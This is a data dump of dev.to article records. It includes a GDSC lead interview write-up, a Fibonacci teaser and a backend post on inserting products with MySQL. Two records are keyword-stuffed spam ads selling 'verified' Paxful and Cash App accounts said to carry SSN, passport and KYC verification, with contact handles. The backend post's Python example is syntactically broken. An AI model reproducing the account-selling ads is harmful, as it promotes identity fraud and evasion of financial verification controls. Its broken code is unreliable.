id
int64
5
1.93M
title
stringlengths
0
128
description
stringlengths
0
25.5k
collection_id
int64
0
28.1k
published_timestamp
timestamp[s]
canonical_url
stringlengths
14
581
tag_list
stringlengths
0
120
body_markdown
stringlengths
0
716k
user_username
stringlengths
2
30
1,909,150
Buy Verified Paxful Account
https://dmhelpshop.com/product/buy-verified-paxful-account/ Buy Verified Paxful Account There are...
0
2024-07-02T17:15:25
https://dev.to/bikacaj604/buy-verified-paxful-account-1m23
tutorial, react, python, ai
ERROR: type should be string, got "https://dmhelpshop.com/product/buy-verified-paxful-account/\n![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/vxubjjig7gkrs2ul0bhh.png)\n\n\n\nBuy Verified Paxful Account\nThere are several compelling reasons to consider purchasing a verified Paxful account. Firstly, a verified account offers enhanced security, providing peace of mind to all users. Additionally, it opens up a wider range of trading opportunities, allowing individuals to partake in various transactions, ultimately expanding their financial horizons.\n\nMoreover, Buy verified Paxful account ensures faster and more streamlined transactions, minimizing any potential delays or inconveniences. Furthermore, by opting for a verified account, users gain access to a trusted and reputable platform, fostering a sense of reliability and confidence.\n\nLastly, Paxful’s verification process is thorough and meticulous, ensuring that only genuine individuals are granted verified status, thereby creating a safer trading environment for all users. Overall, the decision to Buy Verified Paxful account can greatly enhance one’s overall trading experience, offering increased security, access to more opportunities, and a reliable platform to engage with. Buy Verified Paxful Account.\n\nBuy US verified paxful account from the best place dmhelpshop\nWhy we declared this website as the best place to buy US verified paxful account? Because, our company is established for providing the all account services in the USA (our main target) and even in the whole world. With this in mind we create paxful account and customize our accounts as professional with the real documents. Buy Verified Paxful Account.\n\nIf you want to buy US verified paxful account you should have to contact fast with us. Because our accounts are-\n\nEmail verified\nPhone number verified\nSelfie and KYC verified\nSSN (social security no.) verified\nTax ID and passport verified\nSometimes driving license verified\nMasterCard attached and verified\nUsed only genuine and real documents\n100% access of the account\nAll documents provided for customer security\nWhat is Verified Paxful Account?\nIn today’s expanding landscape of online transactions, ensuring security and reliability has become paramount. Given this context, Paxful has quickly risen as a prominent peer-to-peer Bitcoin marketplace, catering to individuals and businesses seeking trusted platforms for cryptocurrency trading.\n\nIn light of the prevalent digital scams and frauds, it is only natural for people to exercise caution when partaking in online transactions. As a result, the concept of a verified account has gained immense significance, serving as a critical feature for numerous online platforms. Paxful recognizes this need and provides a safe haven for users, streamlining their cryptocurrency buying and selling experience.\n\nFor individuals and businesses alike, Buy verified Paxful account emerges as an appealing choice, offering a secure and reliable environment in the ever-expanding world of digital transactions. Buy Verified Paxful Account.\n\nVerified Paxful Accounts are essential for establishing credibility and trust among users who want to transact securely on the platform. They serve as evidence that a user is a reliable seller or buyer, verifying their legitimacy.\n\nBut what constitutes a verified account, and how can one obtain this status on Paxful? In this exploration of verified Paxful accounts, we will unravel the significance they hold, why they are crucial, and shed light on the process behind their activation, providing a comprehensive understanding of how they function. Buy verified Paxful account.\n\n \n\nWhy should to Buy Verified Paxful Account?\nThere are several compelling reasons to consider purchasing a verified Paxful account. Firstly, a verified account offers enhanced security, providing peace of mind to all users. Additionally, it opens up a wider range of trading opportunities, allowing individuals to partake in various transactions, ultimately expanding their financial horizons.\n\nMoreover, a verified Paxful account ensures faster and more streamlined transactions, minimizing any potential delays or inconveniences. Furthermore, by opting for a verified account, users gain access to a trusted and reputable platform, fostering a sense of reliability and confidence. Buy Verified Paxful Account.\n\nLastly, Paxful’s verification process is thorough and meticulous, ensuring that only genuine individuals are granted verified status, thereby creating a safer trading environment for all users. Overall, the decision to buy a verified Paxful account can greatly enhance one’s overall trading experience, offering increased security, access to more opportunities, and a reliable platform to engage with.\n\n \n\nWhat is a Paxful Account\nPaxful and various other platforms consistently release updates that not only address security vulnerabilities but also enhance usability by introducing new features. Buy Verified Paxful Account.\n\nIn line with this, our old accounts have recently undergone upgrades, ensuring that if you purchase an old buy Verified Paxful account from dmhelpshop.com, you will gain access to an account with an impressive history and advanced features. This ensures a seamless and enhanced experience for all users, making it a worthwhile option for everyone.\n\n \n\nIs it safe to buy Paxful Verified Accounts?\nBuying on Paxful is a secure choice for everyone. However, the level of trust amplifies when purchasing from Paxful verified accounts. These accounts belong to sellers who have undergone rigorous scrutiny by Paxful. Buy verified Paxful account, you are automatically designated as a verified account. Hence, purchasing from a Paxful verified account ensures a high level of credibility and utmost reliability. Buy Verified Paxful Account.\n\nPAXFUL, a widely known peer-to-peer cryptocurrency trading platform, has gained significant popularity as a go-to website for purchasing Bitcoin and other cryptocurrencies. It is important to note, however, that while Paxful may not be the most secure option available, its reputation is considerably less problematic compared to many other marketplaces. Buy Verified Paxful Account.\n\nThis brings us to the question: is it safe to purchase Paxful Verified Accounts? Top Paxful reviews offer mixed opinions, suggesting that caution should be exercised. Therefore, users are advised to conduct thorough research and consider all aspects before proceeding with any transactions on Paxful.\n\n \n\nHow Do I Get 100% Real Verified Paxful Accoun?\nPaxful, a renowned peer-to-peer cryptocurrency marketplace, offers users the opportunity to conveniently buy and sell a wide range of cryptocurrencies. Given its growing popularity, both individuals and businesses are seeking to establish verified accounts on this platform.\n\nHowever, the process of creating a verified Paxful account can be intimidating, particularly considering the escalating prevalence of online scams and fraudulent practices. This verification procedure necessitates users to furnish personal information and vital documents, posing potential risks if not conducted meticulously.\n\nIn this comprehensive guide, we will delve into the necessary steps to create a legitimate and verified Paxful account. Our discussion will revolve around the verification process and provide valuable tips to safely navigate through it.\n\nMoreover, we will emphasize the utmost importance of maintaining the security of personal information when creating a verified account. Furthermore, we will shed light on common pitfalls to steer clear of, such as using counterfeit documents or attempting to bypass the verification process.\n\nWhether you are new to Paxful or an experienced user, this engaging paragraph aims to equip everyone with the knowledge they need to establish a secure and authentic presence on the platform.\n\nBenefits Of Verified Paxful Accounts\nVerified Paxful accounts offer numerous advantages compared to regular Paxful accounts. One notable advantage is that verified accounts contribute to building trust within the community.\n\nVerification, although a rigorous process, is essential for peer-to-peer transactions. This is why all Paxful accounts undergo verification after registration. When customers within the community possess confidence and trust, they can conveniently and securely exchange cash for Bitcoin or Ethereum instantly. Buy Verified Paxful Account.\n\nPaxful accounts, trusted and verified by sellers globally, serve as a testament to their unwavering commitment towards their business or passion, ensuring exceptional customer service at all times. Headquartered in Africa, Paxful holds the distinction of being the world’s pioneering peer-to-peer bitcoin marketplace. Spearheaded by its founder, Ray Youssef, Paxful continues to lead the way in revolutionizing the digital exchange landscape.\n\nPaxful has emerged as a favored platform for digital currency trading, catering to a diverse audience. One of Paxful’s key features is its direct peer-to-peer trading system, eliminating the need for intermediaries or cryptocurrency exchanges. By leveraging Paxful’s escrow system, users can trade securely and confidently.\n\nWhat sets Paxful apart is its commitment to identity verification, ensuring a trustworthy environment for buyers and sellers alike. With these user-centric qualities, Paxful has successfully established itself as a leading platform for hassle-free digital currency transactions, appealing to a wide range of individuals seeking a reliable and convenient trading experience. Buy Verified Paxful Account.\n\n \n\nHow paxful ensure risk-free transaction and trading?\nEngage in safe online financial activities by prioritizing verified accounts to reduce the risk of fraud. Platforms like Paxfu implement stringent identity and address verification measures to protect users from scammers and ensure credibility.\n\nWith verified accounts, users can trade with confidence, knowing they are interacting with legitimate individuals or entities. By fostering trust through verified accounts, Paxful strengthens the integrity of its ecosystem, making it a secure space for financial transactions for all users. Buy Verified Paxful Account.\n\nExperience seamless transactions by obtaining a verified Paxful account. Verification signals a user’s dedication to the platform’s guidelines, leading to the prestigious badge of trust. This trust not only expedites trades but also reduces transaction scrutiny. Additionally, verified users unlock exclusive features enhancing efficiency on Paxful. Elevate your trading experience with Verified Paxful Accounts today.\n\nIn the ever-changing realm of online trading and transactions, selecting a platform with minimal fees is paramount for optimizing returns. This choice not only enhances your financial capabilities but also facilitates more frequent trading while safeguarding gains. Buy Verified Paxful Account.\n\nExamining the details of fee configurations reveals Paxful as a frontrunner in cost-effectiveness. Acquire a verified level-3 USA Paxful account from usasmmonline.com for a secure transaction experience. Invest in verified Paxful accounts to take advantage of a leading platform in the online trading landscape.\n\n \n\nHow Old Paxful ensures a lot of Advantages?\n\nExplore the boundless opportunities that Verified Paxful accounts present for businesses looking to venture into the digital currency realm, as companies globally witness heightened profits and expansion. These success stories underline the myriad advantages of Paxful’s user-friendly interface, minimal fees, and robust trading tools, demonstrating its relevance across various sectors.\n\nBusinesses benefit from efficient transaction processing and cost-effective solutions, making Paxful a significant player in facilitating financial operations. Acquire a USA Paxful account effortlessly at a competitive rate from usasmmonline.com and unlock access to a world of possibilities. Buy Verified Paxful Account.\n\nExperience elevated convenience and accessibility through Paxful, where stories of transformation abound. Whether you are an individual seeking seamless transactions or a business eager to tap into a global market, buying old Paxful accounts unveils opportunities for growth.\n\nPaxful’s verified accounts not only offer reliability within the trading community but also serve as a testament to the platform’s ability to empower economic activities worldwide. Join the journey towards expansive possibilities and enhanced financial empowerment with Paxful today. Buy Verified Paxful Account.\n\n \n\nWhy paxful keep the security measures at the top priority?\nIn today’s digital landscape, security stands as a paramount concern for all individuals engaging in online activities, particularly within marketplaces such as Paxful. It is essential for account holders to remain informed about the comprehensive security protocols that are in place to safeguard their information.\n\nSafeguarding your Paxful account is imperative to guaranteeing the safety and security of your transactions. Two essential security components, Two-Factor Authentication and Routine Security Audits, serve as the pillars fortifying this shield of protection, ensuring a secure and trustworthy user experience for all. Buy Verified Paxful Account.\n\nConclusion\nInvesting in Bitcoin offers various avenues, and among those, utilizing a Paxful account has emerged as a favored option. Paxful, an esteemed online marketplace, enables users to engage in buying and selling Bitcoin. Buy Verified Paxful Account.\n\nThe initial step involves creating an account on Paxful and completing the verification process to ensure identity authentication. Subsequently, users gain access to a diverse range of offers from fellow users on the platform. Once a suitable proposal captures your interest, you can proceed to initiate a trade with the respective user, opening the doors to a seamless Bitcoin investing experience.\n\nIn conclusion, when considering the option of purchasing verified Paxful accounts, exercising caution and conducting thorough due diligence is of utmost importance. It is highly recommended to seek reputable sources and diligently research the seller’s history and reviews before making any transactions.\n\nMoreover, it is crucial to familiarize oneself with the terms and conditions outlined by Paxful regarding account verification, bearing in mind the potential consequences of violating those terms. By adhering to these guidelines, individuals can ensure a secure and reliable experience when engaging in such transactions. Buy Verified Paxful Account.\n\n \n\nContact Us / 24 Hours Reply\nTelegram:dmhelpshop\nWhatsApp: +1 ‪(980) 277-2786\nSkype:dmhelpshop\nEmail:dmhelpshop@gmail.com"
bikacaj604
1,909,147
Unveiling the Fibonacci Sequence in C Programming
𝐖𝐡𝐚𝐭 𝐢𝐬 𝐭𝐡𝐞 𝐅𝐢𝐛𝐨𝐧𝐚𝐜𝐜𝐢 𝐒𝐞𝐫𝐢𝐞𝐬? The Fibonacci series is a sequence of numbers where each number is the...
0
2024-07-02T17:05:29
https://dev.to/moksh57/unveiling-the-fibonacci-sequence-in-c-programming-218p
𝐖𝐡𝐚𝐭 𝐢𝐬 𝐭𝐡𝐞 𝐅𝐢𝐛𝐨𝐧𝐚𝐜𝐜𝐢 𝐒𝐞𝐫𝐢𝐞𝐬? The Fibonacci series is a sequence of numbers where each number is the sum of the two preceding ones. It starts from 0 and 1, and the series looks something like this: 0,1,1,2,3,5,8,13,21,34,… 𝐖𝐡𝐲 𝐢𝐬 𝐢𝐭 𝐈𝐦𝐩𝐨𝐫𝐭𝐚𝐧𝐭? The Fibonacci series transcends its mathematical roots, manifesting in various natural phenomena and human creations. From the spiral patterns of galaxies to the arrangement of petals in flowers and the proportions of ancient architecture, the Fibonacci sequence embodies a universal pattern recognized across disciplines. In art, its rhythmic progression and harmonious proportions have inspired countless works. In computer science and algorithms, Fibonacci numbers serve as a foundation for efficient problem-solving techniques, from dynamic programming to optimizing recursive functions. Understanding and generating the Fibonacci series not only deepen one's grasp of mathematical concepts but also nurtures an appreciation for the intricate patterns woven into our world. It encourages creativity in problem-solving and fosters a deeper connection between mathematics and its practical applications. Read More: https://mokshelearning.blogspot.com/2024/07/18-Program-FibonacciSeries.html
moksh57
1,909,148
My GDSC Lead Interview 2024
Okay so let me go step by step... Decoding the GDSC Lead Interview: The email arrived,...
0
2024-07-02T17:04:27
https://dev.to/kaustubhpaul18/my-gdsc-lead-interview-2024-56n7
google, interview, googlecloud
Okay so let me go step by step... ## Decoding the GDSC Lead Interview: The email arrived, crisp and official: **"GDSC Lead Interview Invitation."** My heart pounded with a mix of excitement and nervousness. Leading a Google Developers Student Clubs (GDSC) chapter was a dream I'd nurtured for a while, and the interview was the gateway. Here's a breakdown of that experience, with tips for future GDSC lead applicants. ## Before the Interview: The days leading up to the interview were a whirlwind of preparation. I visited online resources for common GDSC lead interview questions. I revisited the GDSC mission and familiarized myself with Google's developer tools and resources. Most importantly, I reflected on my own experiences: _Past leadership roles, Technical skills, and Ideas for the GDSC chapter._ I brushed up my knowledge about basic Computer Science aspects and prepared myself to stay confident. I talked with my current GDSC Lead and she encouraged me as well before the interview. ## The Interview Day: Nerves and Excitement were on another level that day. The interview platform buzzed with anticipation. My interviewer was friendly and encouraging. The interview itself was a mix of different sections: - **_Self-Introduction:_** This was a chance to showcase my passion for technology and my vision for the GDSC chapter. I gave a brief introduction about myself covering the important portions such as my technical skills and since I was currently serving as the Management Lead in the GDSC of my college I shared some of my leadership experiences with them. Overall this section lightened my fear a bit and I was able to be more comfortable in front of them. - **_Technical Knowledge:_** There were basic questions on programming concepts, data structures, and algorithms, OOPS. Brushing up on these beforehand definitely helped! Moreover since I was a daily grinder of Google Cloud Arcade Games I was asked some core questions from the GCP including all its tools and how to use them. I gave all the answers confidently as everything was under my domain. Then I was asked about my projects and I shared my Github Repository which consisted of few of them. Here I'm listing some of the questions which were asked to me. 1. _What do you know about OOPS?_ 2. _What are Data Structures and Algorithms?_ 3. _Which of the tools of Google do we use in our daily life?_ 4. _What are the 4 pillars of OOPS?_ 5. _What is the time complexity of Bubble Sort?_ - **_Leadership Experience:_** Here, I spoke about past leadership roles (even if they weren't technical) and how I fostered teamwork and achieved goals. Since I was the current Management Lead, I was responsible for hosting events and I shared my experience of hosting some of the past events which were conducted perfectly. Highlighting problem-solving skills was also important along with the mentoring capability of juniors as well as batchmates. - **_GDSC Vision:_** This section was about outlining my plans for the chapter. I spoke about workshops, events, and initiatives I wanted to implement, keeping the specific needs of our student body in mind. Here I faced some really interesting and tricky questions through which the interviewer actually tested my skills in running a GDSC chapter. In short, this section will be the actual assessment of your character and innovation. I'm giving an overview about what sort of questions I faced in this section. I was put under certain situations and a problem was pitched in front of me, of which I was expected to give a solution keeping in mind the community guidelines. 1. _If you become a GDSC Lead what will be your primary target to set up the chapter?_ 2. _If two of your core team members are having an issue with each other just before a big event what will be your steps and how will you deal with it?_ 3. _If there occurs an emergency situation with an attendee during an ongoing event what measures will you take as a GDSC Lead?_ 4. _What checkboxes will you tick before hosting a full fledged offline event?_ - **_Open Discussion: _** This final part allowed me to ask questions about the GDSC program and the role itself. It's a great opportunity to show your genuine interest and initiative. Here you can clear your doubts (if any) from the interviewer. ## Beyond the Interview-"Takeaways" The GDSC lead interview was a valuable experience, even if the outcome isn't yet known. It made me articulate my goals, refine my technical knowledge, and solidify my vision for the GDSC chapter. Here are some key takeaways: **Preparation is key:** Research GDSC, practice interview questions, and be ready to showcase your skills and passion. You maybe asked about the current technological affairs. Thus you have to be up to date with all the current technologies. **Be confident:** Even if you're nervous, project confidence and enthusiasm. Your passion for technology and the GDSC mission will shine through. **You Have to be very Honest:** The GDSC Lead Interview is the most important way of assessment of character of the candidate. so you've to be very honest. **Highlight your strengths:** Focus on experiences that demonstrate leadership, problem-solving, and teamwork skills. **Be creative:** When outlining your vision, think outside the box and propose unique and engaging events for the GDSC chapter. **No Negative Answers:** Even if you get stuck in any of the answers or you can't answer any of the questions , don't just say , _"I don't know the answer"_ straightaway. It poses a negative impact. Instead you can go for a more polite and positive answer which can potray that even though you don't know a specific thing, you're eager to know about it. **_NOTE-_** _Whether you secure the lead role or not, the GDSC interview process is a stepping stone. It cultivates valuable skills and gives you a deeper understanding of the GDSC program. So, if you're passionate about technology and want to build a vibrant developer community on campus, go for it!!_
kaustubhpaul18
1,909,146
Buy verified cash app account
https://dmhelpshop.com/product/buy-verified-cash-app-account/ Buy verified cash app account Cash...
0
2024-07-02T17:02:30
https://dev.to/bikacaj604/buy-verified-cash-app-account-4kjf
webdev, javascript, beginners, programming
ERROR: type should be string, got "https://dmhelpshop.com/product/buy-verified-cash-app-account/\t\n![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/d2amspvmsrtm179x08ox.png)\n\n\n\nBuy verified cash app account\nCash app has emerged as a dominant force in the realm of mobile banking within the USA, offering unparalleled convenience for digital money transfers, deposits, and trading. As the foremost provider of fully verified cash app accounts, we take pride in our ability to deliver accounts with substantial limits. Bitcoin enablement, and an unmatched level of security.\n\nOur commitment to facilitating seamless transactions and enabling digital currency trades has garnered significant acclaim, as evidenced by the overwhelming response from our satisfied clientele. Those seeking buy verified cash app account with 100% legitimate documentation and unrestricted access need look no further. Get in touch with us promptly to acquire your verified cash app account and take advantage of all the benefits it has to offer.\n\nWhy dmhelpshop is the best place to buy USA cash app accounts?\nIt’s crucial to stay informed about any updates to the platform you’re using. If an update has been released, it’s important to explore alternative options. Contact the platform’s support team to inquire about the status of the cash app service.\n\nClearly communicate your requirements and inquire whether they can meet your needs and provide the buy verified cash app account promptly. If they assure you that they can fulfill your requirements within the specified timeframe, proceed with the verification process using the required documents.\n\nOur account verification process includes the submission of the following documents: [List of specific documents required for verification].\n\nGenuine and activated email verified\nRegistered phone number (USA)\nSelfie verified\nSSN (social security number) verified\nDriving license\nBTC enable or not enable (BTC enable best)\n100% replacement guaranteed\n100% customer satisfaction\nWhen it comes to staying on top of the latest platform updates, it’s crucial to act fast and ensure you’re positioned in the best possible place. If you’re considering a switch, reaching out to the right contacts and inquiring about the status of the buy verified cash app account service update is essential.\n\nClearly communicate your requirements and gauge their commitment to fulfilling them promptly. Once you’ve confirmed their capability, proceed with the verification process using genuine and activated email verification, a registered USA phone number, selfie verification, social security number (SSN) verification, and a valid driving license.\n\nAdditionally, assessing whether BTC enablement is available is advisable, buy verified cash app account, with a preference for this feature. It’s important to note that a 100% replacement guarantee and ensuring 100% customer satisfaction are essential benchmarks in this process.\n\nHow to use the Cash Card to make purchases?\nTo activate your Cash Card, open the Cash App on your compatible device, locate the Cash Card icon at the bottom of the screen, and tap on it. Then select “Activate Cash Card” and proceed to scan the QR code on your card. Alternatively, you can manually enter the CVV and expiration date. How To Buy Verified Cash App Accounts.\n\nAfter submitting your information, including your registered number, expiration date, and CVV code, you can start making payments by conveniently tapping your card on a contactless-enabled payment terminal. Consider obtaining a buy verified Cash App account for seamless transactions, especially for business purposes. Buy verified cash app account.\n\nWhy we suggest to unchanged the Cash App account username?\nTo activate your Cash Card, open the Cash App on your compatible device, locate the Cash Card icon at the bottom of the screen, and tap on it. Then select “Activate Cash Card” and proceed to scan the QR code on your card.\n\nAlternatively, you can manually enter the CVV and expiration date. After submitting your information, including your registered number, expiration date, and CVV code, you can start making payments by conveniently tapping your card on a contactless-enabled payment terminal. Consider obtaining a verified Cash App account for seamless transactions, especially for business purposes. Buy verified cash app account. Purchase Verified Cash App Accounts.\n\nSelecting a username in an app usually comes with the understanding that it cannot be easily changed within the app’s settings or options. This deliberate control is in place to uphold consistency and minimize potential user confusion, especially for those who have added you as a contact using your username. In addition, purchasing a Cash App account with verified genuine documents already linked to the account ensures a reliable and secure transaction experience.\n\n \n\nBuy verified cash app accounts quickly and easily for all your financial needs.\nAs the user base of our platform continues to grow, the significance of verified accounts cannot be overstated for both businesses and individuals seeking to leverage its full range of features. How To Buy Verified Cash App Accounts.\n\nFor entrepreneurs, freelancers, and investors alike, a verified cash app account opens the door to sending, receiving, and withdrawing substantial amounts of money, offering unparalleled convenience and flexibility. Whether you’re conducting business or managing personal finances, the benefits of a verified account are clear, providing a secure and efficient means to transact and manage funds at scale.\n\nWhen it comes to the rising trend of purchasing buy verified cash app account, it’s crucial to tread carefully and opt for reputable providers to steer clear of potential scams and fraudulent activities. How To Buy Verified Cash App Accounts.  With numerous providers offering this service at competitive prices, it is paramount to be diligent in selecting a trusted source.\n\nThis article serves as a comprehensive guide, equipping you with the essential knowledge to navigate the process of procuring buy verified cash app account, ensuring that you are well-informed before making any purchasing decisions. Understanding the fundamentals is key, and by following this guide, you’ll be empowered to make informed choices with confidence.\n\n \n\nIs it safe to buy Cash App Verified Accounts?\nCash App, being a prominent peer-to-peer mobile payment application, is widely utilized by numerous individuals for their transactions. However, concerns regarding its safety have arisen, particularly pertaining to the purchase of “verified” accounts through Cash App. This raises questions about the security of Cash App’s verification process.\n\nUnfortunately, the answer is negative, as buying such verified accounts entails risks and is deemed unsafe. Therefore, it is crucial for everyone to exercise caution and be aware of potential vulnerabilities when using Cash App. How To Buy Verified Cash App Accounts.\n\nCash App has emerged as a widely embraced platform for purchasing Instagram Followers using PayPal, catering to a diverse range of users. This convenient application permits individuals possessing a PayPal account to procure authenticated Instagram Followers.\n\nLeveraging the Cash App, users can either opt to procure followers for a predetermined quantity or exercise patience until their account accrues a substantial follower count, subsequently making a bulk purchase. Although the Cash App provides this service, it is crucial to discern between genuine and counterfeit items. If you find yourself in search of counterfeit products such as a Rolex, a Louis Vuitton item, or a Louis Vuitton bag, there are two viable approaches to consider.\n\n \n\nWhy you need to buy verified Cash App accounts personal or business?\nThe Cash App is a versatile digital wallet enabling seamless money transfers among its users. However, it presents a concern as it facilitates transfer to both verified and unverified individuals.\n\nTo address this, the Cash App offers the option to become a verified user, which unlocks a range of advantages. Verified users can enjoy perks such as express payment, immediate issue resolution, and a generous interest-free period of up to two weeks. With its user-friendly interface and enhanced capabilities, the Cash App caters to the needs of a wide audience, ensuring convenient and secure digital transactions for all.\n\nIf you’re a business person seeking additional funds to expand your business, we have a solution for you. Payroll management can often be a challenging task, regardless of whether you’re a small family-run business or a large corporation. How To Buy Verified Cash App Accounts.\n\nImproper payment practices can lead to potential issues with your employees, as they could report you to the government. However, worry not, as we offer a reliable and efficient way to ensure proper payroll management, avoiding any potential complications. Our services provide you with the funds you need without compromising your reputation or legal standing. With our assistance, you can focus on growing your business while maintaining a professional and compliant relationship with your employees. Purchase Verified Cash App Accounts.\n\nA Cash App has emerged as a leading peer-to-peer payment method, catering to a wide range of users. With its seamless functionality, individuals can effortlessly send and receive cash in a matter of seconds, bypassing the need for a traditional bank account or social security number. Buy verified cash app account.\n\nThis accessibility makes it particularly appealing to millennials, addressing a common challenge they face in accessing physical currency. As a result, ACash App has established itself as a preferred choice among diverse audiences, enabling swift and hassle-free transactions for everyone. Purchase Verified Cash App Accounts.\n\n \n\nHow to verify Cash App accounts\nTo ensure the verification of your Cash App account, it is essential to securely store all your required documents in your account. This process includes accurately supplying your date of birth and verifying the US or UK phone number linked to your Cash App account.\n\nAs part of the verification process, you will be asked to submit accurate personal details such as your date of birth, the last four digits of your SSN, and your email address. If additional information is requested by the Cash App community to validate your account, be prepared to provide it promptly. Upon successful verification, you will gain full access to managing your account balance, as well as sending and receiving funds seamlessly. Buy verified cash app account.\n\n \n\nHow cash used for international transaction?\nExperience the seamless convenience of this innovative platform that simplifies money transfers to the level of sending a text message. It effortlessly connects users within the familiar confines of their respective currency regions, primarily in the United States and the United Kingdom.\n\nNo matter if you’re a freelancer seeking to diversify your clientele or a small business eager to enhance market presence, this solution caters to your financial needs efficiently and securely. Embrace a world of unlimited possibilities while staying connected to your currency domain. Buy verified cash app account.\n\nUnderstanding the currency capabilities of your selected payment application is essential in today’s digital landscape, where versatile financial tools are increasingly sought after. In this era of rapid technological advancements, being well-informed about platforms such as Cash App is crucial.\n\nAs we progress into the digital age, the significance of keeping abreast of such services becomes more pronounced, emphasizing the necessity of staying updated with the evolving financial trends and options available. Buy verified cash app account.\n\nOffers and advantage to buy cash app accounts cheap?\nWith Cash App, the possibilities are endless, offering numerous advantages in online marketing, cryptocurrency trading, and mobile banking while ensuring high security. As a top creator of Cash App accounts, our team possesses unparalleled expertise in navigating the platform.\n\nWe deliver accounts with maximum security and unwavering loyalty at competitive prices unmatched by other agencies. Rest assured, you can trust our services without hesitation, as we prioritize your peace of mind and satisfaction above all else.\n\nEnhance your business operations effortlessly by utilizing the Cash App e-wallet for seamless payment processing, money transfers, and various other essential tasks. Amidst a myriad of transaction platforms in existence today, the Cash App e-wallet stands out as a premier choice, offering users a multitude of functions to streamline their financial activities effectively. Buy verified cash app account.\n\nTrustbizs.com stands by the Cash App’s superiority and recommends acquiring your Cash App accounts from this trusted source to optimize your business potential.\n\nHow Customizable are the Payment Options on Cash App for Businesses?\nDiscover the flexible payment options available to businesses on Cash App, enabling a range of customization features to streamline transactions. Business users have the ability to adjust transaction amounts, incorporate tipping options, and leverage robust reporting tools for enhanced financial management.\n\nExplore trustbizs.com to acquire verified Cash App accounts with LD backup at a competitive price, ensuring a secure and efficient payment solution for your business needs. Buy verified cash app account.\n\nDiscover Cash App, an innovative platform ideal for small business owners and entrepreneurs aiming to simplify their financial operations. With its intuitive interface, Cash App empowers businesses to seamlessly receive payments and effectively oversee their finances. Emphasizing customization, this app accommodates a variety of business requirements and preferences, making it a versatile tool for all.\n\nWhere To Buy Verified Cash App Accounts\nWhen considering purchasing a verified Cash App account, it is imperative to carefully scrutinize the seller’s pricing and payment methods. Look for pricing that aligns with the market value, ensuring transparency and legitimacy. Buy verified cash app account.\n\nEqually important is the need to opt for sellers who provide secure payment channels to safeguard your financial data. Trust your intuition; skepticism towards deals that appear overly advantageous or sellers who raise red flags is warranted. It is always wise to prioritize caution and explore alternative avenues if uncertainties arise.\n\nThe Importance Of Verified Cash App Accounts\nIn today’s digital age, the significance of verified Cash App accounts cannot be overstated, as they serve as a cornerstone for secure and trustworthy online transactions.\n\nBy acquiring verified Cash App accounts, users not only establish credibility but also instill the confidence required to participate in financial endeavors with peace of mind, thus solidifying its status as an indispensable asset for individuals navigating the digital marketplace.\n\nWhen considering purchasing a verified Cash App account, it is imperative to carefully scrutinize the seller’s pricing and payment methods. Look for pricing that aligns with the market value, ensuring transparency and legitimacy. Buy verified cash app account.\n\nEqually important is the need to opt for sellers who provide secure payment channels to safeguard your financial data. Trust your intuition; skepticism towards deals that appear overly advantageous or sellers who raise red flags is warranted. It is always wise to prioritize caution and explore alternative avenues if uncertainties arise.\n\nConclusion\nEnhance your online financial transactions with verified Cash App accounts, a secure and convenient option for all individuals. By purchasing these accounts, you can access exclusive features, benefit from higher transaction limits, and enjoy enhanced protection against fraudulent activities. Streamline your financial interactions and experience peace of mind knowing your transactions are secure and efficient with verified Cash App accounts.\n\nChoose a trusted provider when acquiring accounts to guarantee legitimacy and reliability. In an era where Cash App is increasingly favored for financial transactions, possessing a verified account offers users peace of mind and ease in managing their finances. Make informed decisions to safeguard your financial assets and streamline your personal transactions effectively.\n\nContact Us / 24 Hours Reply\nTelegram:dmhelpshop\nWhatsApp: +1 ‪(980) 277-2786\nSkype:dmhelpshop\nEmail:dmhelpshop@gmail.com\n\n\n\n"
bikacaj604
1,908,006
Backend and solving problems
I was building a grocery app. The grocery app required a feature that allowed store managers to add...
0
2024-07-01T17:21:30
https://dev.to/uti/backend-and-solving-problems-2mff
I was building a grocery app. The grocery app required a feature that allowed store managers to add new products dynamically. This task required a deep understanding of database operations and efficient coding practices. The requirements for the feature included input validation, database interaction, error handling, and ensuring that each product had a unique combination of name and category, preventing duplicate entries. The database schema for the products table needed to be well-defined, and a simplified version of the schema was used. The code includes the following steps: 1. Understanding the requirements: Gathering the requirements for the feature, such as input validation, database interaction, and error handling. 2. Setting up the database schema: Creating a well-defined schema for the products table. 3. Writing the Python code: Importing necessary libraries, setting up the database connection, and defining the Product Model class. 4. Testing the solution: Testing the solution thoroughly to ensure it handled all edge cases, including missing details, duplicate entries, and incorrect data types. 5. Uisng Parameterized Query. For example, import mysql.connector try: connection = mysql.connector.connect(host='localhost', database='python_db', user='root') cursor = connection.cursor(prepared=True) # Parameterized query sql_insert_query = """ INSERT INTO Products (id, Name, price) VALUES(%s,%s,%s)""" # tuple to insert at placeholder tuple1 = (1, "Json", , 9000) cursor.execute(sql_insert_query, tuple1) cursor.execute(sql_insert_query, tuple2) connection.commit() print("Data inserted successfully into employee table using the prepared statement") except mysql.connector.Error as error: print("parameterized query failed {}".format(error)) finally: if connection.is_connected(): cursor.close() connection.close() print("MySQL connection is closed") The code performed well, providing appropriate error messages and successfully adding valid products to the database. Input validation ensured that all necessary product details (id, Name, price) were provided, while database interaction ensured that the new product was inserted without causing any integrity issues. Error handling handled cases where the product already exists or required fields were missing. The database schema for the products table was well-defined, with a simplified version of the schema used. The code was tested on MySQL to ensure that the solution was effective and efficient. In conclusion, the grocery app required a dynamic product insertion feature that allowed store managers to add new products dynamically. It involved understanding the requirements, setting up the database schema, and testing the solution thoroughly to ensure it effectively handles edge cases and ensures seamless and robust insertion of products into the database. HNG Internship Programmes are a great option for anyone looking to enhance their development abilities in a disciplined and encouraging setting. Numerous tools and possibilities are provided by these programmes, such as networking on the HNG Premium Workspace, CV evaluations, and job offers. Visit the HNG Premium website at https://hng.tech/premium and the HNG Internship page at https://hng.tech/internship to find out more.
uti
1,909,145
Functional Patterns: Interfaces and Functors
This is part 3 of a series of articles entitled Functional Patterns. Make sure to check out the...
0
2024-07-02T17:00:57
https://dev.to/if-els/functional-patterns-interfaces-and-functors-359e
programming, haskell, learning, go
